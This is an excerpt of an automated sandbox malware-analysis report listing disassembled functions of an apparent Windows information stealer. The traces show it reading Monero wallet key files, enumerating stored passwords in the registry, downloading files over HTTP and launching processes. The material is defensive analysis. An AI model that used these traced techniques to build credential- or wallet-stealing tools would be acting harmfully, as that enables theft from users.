                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                  • API String ID: 1930502592-218353709
                                                  • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                  • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                  • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                  • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                  Function 004152C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02D4AE30), ref: 00406303
                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02D4A0C8,00000000,00000000,00400100,00000000), ref: 00406385
                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                  • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                  • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                  • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                  • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                  • API String ID: 3532888709-1526165396
                                                  • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                  • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                  • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                  • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                  Function 004060A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                  • StrCmpCA.SHLWAPI(?,02D4AE30), ref: 00406147
                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                  • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                  • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                  • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                  • String ID: a+A$a+A
                                                  • API String ID: 4287319946-2847607090
                                                  • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                  • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                  • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                  • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                  Function 02F10CC7 Relevance: 18.2, APIs: 12, Instructions: 205stringprocesssynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • memset.MSVCRT ref: 02F10E83
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10E9C
                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 02F10EAE
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10EC4
                                                  • lstrcat.KERNEL32(?,00420D80), ref: 02F10ED6
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10EEF
                                                  • lstrcat.KERNEL32(?,00420D84), ref: 02F10F01
                                                  • lstrlen.KERNEL32(?), ref: 02F10F0E
                                                  • memset.MSVCRT ref: 02F10F34
                                                  • memset.MSVCRT ref: 02F10F48
                                                    • Part of subcall function 02F1AA87: lstrlen.KERNEL32(02F0516C,?,?,02F0516C,00420DDE), ref: 02F1AA92
                                                    • Part of subcall function 02F1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02F1AAEC
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F19927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02F10DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02F19948
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02F10FC1
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F10FCD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID:
                                                  • API String ID: 1395395982-0
                                                  • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                  • Instruction ID: 7ef6f1471424040ddb573a42b6609384e66013eea27c60a075d7ac08389f7528
                                                  • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                  • Instruction Fuzzy Hash: DB8194B5941218ABCB14EBA0DD91FED773AAF44744F80419DA30A660C1EF746B88CF59
                                                  Function 02F10CB6 Relevance: 18.2, APIs: 12, Instructions: 185stringprocesssynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • memset.MSVCRT ref: 02F10E83
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10E9C
                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 02F10EAE
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10EC4
                                                  • lstrcat.KERNEL32(?,00420D80), ref: 02F10ED6
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F10EEF
                                                  • lstrcat.KERNEL32(?,00420D84), ref: 02F10F01
                                                  • lstrlen.KERNEL32(?), ref: 02F10F0E
                                                  • memset.MSVCRT ref: 02F10F34
                                                  • memset.MSVCRT ref: 02F10F48
                                                    • Part of subcall function 02F1AA87: lstrlen.KERNEL32(02F0516C,?,?,02F0516C,00420DDE), ref: 02F1AA92
                                                    • Part of subcall function 02F1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02F1AAEC
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F19927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02F10DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02F19948
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02F10FC1
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F10FCD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID:
                                                  • API String ID: 1395395982-0
                                                  • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                  • Instruction ID: 088e6e894abd3afd9e1a0b57b5652edb08ad6de0aa6435f224bd2b7b0197ec31
                                                  • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                  • Instruction Fuzzy Hash: 0F61F5B5901218ABCB14EBA0CD95FEE773AAF44744F80419DE70A660C1EF746B88CF59
                                                  Function 02F04AE7 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A51
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A68
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A7F
                                                    • Part of subcall function 02F04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02F04AA0
                                                    • Part of subcall function 02F04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02F04AB0
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02F04B7C
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 02F04BA1
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02F04D21
                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 02F0504F
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02F0506B
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02F0507F
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02F050B0
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F05114
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F0512C
                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02F04D7C
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F05136
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                  • String ID:
                                                  • API String ID: 2402878923-0
                                                  • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                  • Instruction ID: 7533bf6acbcf41fca5184f1c404d9476242eb68bafd30d8c4e4a4d83dcd162c3
                                                  • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                  • Instruction Fuzzy Hash: AD12DF72912218EBCB15EB90DD91FEEB77ABF15740F904199A20A72090EF746F88CF51
                                                  Function 02F064E7 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A51
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A68
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A7F
                                                    • Part of subcall function 02F04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02F04AA0
                                                    • Part of subcall function 02F04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02F04AB0
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02F06548
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 02F0656A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02F0659C
                                                  • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02F065EC
                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02F06626
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02F06638
                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 02F06664
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02F066D4
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F06756
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F06760
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F0676A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                  • String ID:
                                                  • API String ID: 3074848878-0
                                                  • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                  • Instruction ID: efd03ad48bc78ba1ebd27e89ea217c158bd116a8dbd2e51bd56c09ecda7b3b79
                                                  • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                  • Instruction Fuzzy Hash: 62715C75A40218EBDB24DFE0DC88BEEB779FB44740F504199E60AAB1D0DBB56A84CF41
                                                  Function 02F19277 Relevance: 16.7, APIs: 11, Instructions: 184COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02F192D3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateGlobalStream
                                                  • String ID:
                                                  • API String ID: 2244384528-0
                                                  • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                  • Instruction ID: db95be2f03c0527e868768abab5d05f92bca551e729b4789849533d903c571e7
                                                  • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                  • Instruction Fuzzy Hash: C1710CB9A40208ABDB14DFE4DD94FEEB7BAFF49700F508108F605A7290DB74A904CB61
                                                  Function 004170D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                  • memset.MSVCRT ref: 0041716A
                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                  Strings
                                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                  • sA, xrefs: 00417111
                                                  • sA, xrefs: 004172AE, 00417179, 0041717C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: OpenProcesslstrcpymemset
                                                  • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                  • API String ID: 224852652-2614523144
                                                  • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                  • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                  • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                  • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                  Function 02F17767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02F177A9
                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F177E6
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F1786A
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F17871
                                                  • wsprintfA.USER32 ref: 02F178A7
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                  • String ID: :$C$\$B
                                                  • API String ID: 1544550907-183544611
                                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction ID: 59e02d79333ed1ce62a26999341846eb24e5473e664018ec1d46237f9d0e5f0b
                                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction Fuzzy Hash: 7641A2B1D00258EBDB10EF94CC45FEEBBB9EF48750F100199E609A7280E7756A84CFA5
                                                  Function 004075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                    • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                    • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                    • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                    • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                    • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                  • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                  • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                  • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                  • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                  • task.LIBCPMTD ref: 004076FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                  • String ID: :
                                                  • API String ID: 3191641157-3653984579
                                                  • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                  • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                  • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                  • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                  Function 02F11612 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrcpy.KERNEL32(?,?), ref: 02F11642
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                    • Part of subcall function 02F194C7: StrStrA.SHLWAPI(?,?), ref: 02F194D3
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 02F1167E
                                                    • Part of subcall function 02F194C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 02F194F7
                                                    • Part of subcall function 02F194C7: lstrlen.KERNEL32(?), ref: 02F1950E
